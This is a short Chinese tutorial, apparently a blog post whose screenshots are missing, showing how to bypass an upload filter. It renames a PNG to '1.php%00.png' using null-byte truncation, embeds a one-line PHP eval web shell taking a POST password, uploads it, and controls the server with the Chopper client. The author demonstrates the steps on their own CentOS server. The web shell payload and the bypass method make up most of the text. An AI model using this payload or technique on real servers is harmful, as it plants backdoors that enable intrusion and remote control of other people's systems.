在kali的里面随机找一张png结尾的图片,然后重命名一下改成1.php%00.png。
改成这样的名字!!
然后用编辑器编辑一下!
在空白处写入一句话木马!!<%php @eval($_POST[pass]);?>
像这样:
然后保存!
打开burpsuit抓个包看看!!
可惜了,我们用了%00截断不需要改包!
这样就上传成功!!!
在菜刀地址上填上上路径!!再填上上密码!!!
就可以看见我的服务器里面的目录了,因为我的centos 7 所以罗!
然后我们进入我的服务器端看看!!
画红线的就是我们上传的木马!!!